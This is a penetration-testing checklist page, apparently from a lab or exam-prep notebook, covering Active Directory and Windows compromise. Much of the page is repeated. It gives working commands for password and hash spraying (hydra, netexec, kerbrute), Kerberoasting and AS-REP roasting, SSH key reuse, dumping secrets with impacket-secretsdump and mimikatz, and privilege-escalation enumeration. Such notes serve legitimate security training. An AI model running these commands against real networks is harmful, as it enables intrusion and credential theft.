Penetration Test Checklist

Unauthenticated Recon - Domain

.
Check for & users.
Bruteforce kerberos users via .

Initial Compromise of Network

nmap scan of internal network
smb shares
Check for & users.

Windows Privilege Escalation

Harvested a New Credential

Make sure to test twice. Once for domain and once for "--local-auth" to test local user passwords.

Spray Passwords

$ hydra -l "yoshi" -p 'Mushroom!' -M ips.txt rdp

$ netexec smb ips.txt -u users.txt -p passwords.txt

$ netexec winrm ips.txt -u users.txt -p passwords.txt

$ netexec wmi ips.txt -u users.txt -p passwords.txt

$ netexec mssql ips.txt -u users.txt -p passwords.txt -local-auth

Manual Spray (if above didn't recover anything).

$ proxychains evil-winrm -i 10.10.93.154 -u Administrator -p "Passwords"

$ proxychains xfreerdp /v:10.10.93.154 /u:Administrator /p:password

Harvested Domain Credential

Kerbrute

$ proxychains kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

Kerberoast

$ proxychains impacket-GetUserSPNs -request -dc-ip 10.10.113.146 corp.com/web_svc

ASREP Roast

$ proxychains impacket-GetNPUsers -dc-ip 192.168.50.70  -request -outputfile hashes.asreproast corp.com/pete

Harvest new Hash

Check with crackstation

$ NetExec rdp 192.168.215.175 -u users.txt -H hashes.txt

Harvested a new Private Key

Spray Intranet (.ssh)

If we have a shell on a box and notice a user has a private key in their home directory, we should test it against all computers with ssh open.

victim@host$ ssh -i id_rsa mario@172.16.233.14

Popped a new Shell

Manual Enumeration

Check for sensitive files
Check for potential binary hijacking
Check for scheduled tasks / services running under other users.

Domain Connected User

Check ACL's/ACE's

bloodhound / sharphound
powerview

PWNED Shell?- Dump Secrets!

$ proxychains impacket-secretsdump -hashes ":e728ecbadfb02f51ce8eed753f3ff3fd" celia.almeda@10.10.85.142

```
PS> .\mimikatz.exe
```

Privilege Escalation - Windows

Automated Enumeration

```
PS> .\winPEASx64.exe
```

PS> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Manual Enumeration

systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Network Card(s)" /C:"Hotfix(s)"

```
whoami /priv
```
```
net user <user>
```
```
net localgroup administrators
```
```
cmd.exe /c dir /a C:\
```
```
ls "program files"
```
```
netstat -nao
```

.\SharpHound -c All --domain medtech.com --zipfilename MEDTECH.zip

Active Directory Lateral Movement

bloodhound / sharphound (Shortest path to high value targets)
Certify / Certipy - Check for vulnerable ADCS's
mimikatz
netexec spray passwords & hashes
NTLM Relay Attack
Check for Service Accounts
Kerberoast / AS-REPRoast

Crying for help?

PreviousUseful Commands NextInformation Gathering / Reconnaissance

Last updated 6 months ago

Unauthenticated Recon - Domain

.
Check for & users.
Bruteforce kerberos users via .

Initial Compromise of Network

nmap scan of internal network
smb shares
Check for & users.

Windows Privilege Escalation

Harvested a New Credential

Make sure to test twice. Once for domain and once for "--local-auth" to test local user passwords.

Spray Passwords

$ hydra -l "yoshi" -p 'Mushroom!' -M ips.txt rdp

$ netexec smb ips.txt -u users.txt -p passwords.txt

$ netexec winrm ips.txt -u users.txt -p passwords.txt

$ netexec wmi ips.txt -u users.txt -p passwords.txt

$ netexec mssql ips.txt -u users.txt -p passwords.txt -local-auth

Manual Spray (if above didn't recover anything).

$ proxychains evil-winrm -i 10.10.93.154 -u Administrator -p "Passwords"

$ proxychains xfreerdp /v:10.10.93.154 /u:Administrator /p:password

Harvested Domain Credential

Kerbrute

$ proxychains kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1

Kerberoast

$ proxychains impacket-GetUserSPNs -request -dc-ip 10.10.113.146 corp.com/web_svc

ASREP Roast

$ proxychains impacket-GetNPUsers -dc-ip 192.168.50.70  -request -outputfile hashes.asreproast corp.com/pete

Harvest new Hash

Check with crackstation

$ NetExec rdp 192.168.215.175 -u users.txt -H hashes.txt

Harvested a new Private Key

Spray Intranet (.ssh)

If we have a shell on a box and notice a user has a private key in their home directory, we should test it against all computers with ssh open.

victim@host$ ssh -i id_rsa mario@172.16.233.14

Popped a new Shell

Manual Enumeration

"whoami /priv" for potential exploits
Check for sensitive files
Check for potential binary hijacking
Check for scheduled tasks / services running under other users.

Domain Connected User

Check ACL's/ACE's

bloodhound / sharphound
powerview

PWNED Shell?- Dump Secrets!

$ proxychains impacket-secretsdump -hashes ":e728ecbadfb02f51ce8eed753f3ff3fd" celia.almeda@10.10.85.142

```
PS> .\mimikatz.exe
```

Privilege Escalation - Windows

Automated Enumeration

```
PS> .\winPEASx64.exe
```

PS> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

Manual Enumeration

systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Network Card(s)" /C:"Hotfix(s)"

```
whoami /priv
```
```
net user <user>
```
```
net localgroup administrators
```
```
cmd.exe /c dir /a C:\
```
```
ls "program files"
```
```
netstat -nao
```

.\SharpHound -c All --domain medtech.com --zipfilename MEDTECH.zip

Active Directory Lateral Movement

bloodhound / sharphound (Shortest path to high value targets)
Certify / Certipy - Check for vulnerable ADCS's
mimikatz
netexec spray passwords & hashes
NTLM Relay Attack
Check for Service Accounts
Kerberoast / AS-REPRoast

Crying for help?

Check

"whoami /priv" for potential exploits

Check

🦈

Checklist - Local Windows Privilege EscalationHackTricks

PayloadsAllTheThings/Windows - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThingsGitHub

Check ALL privileges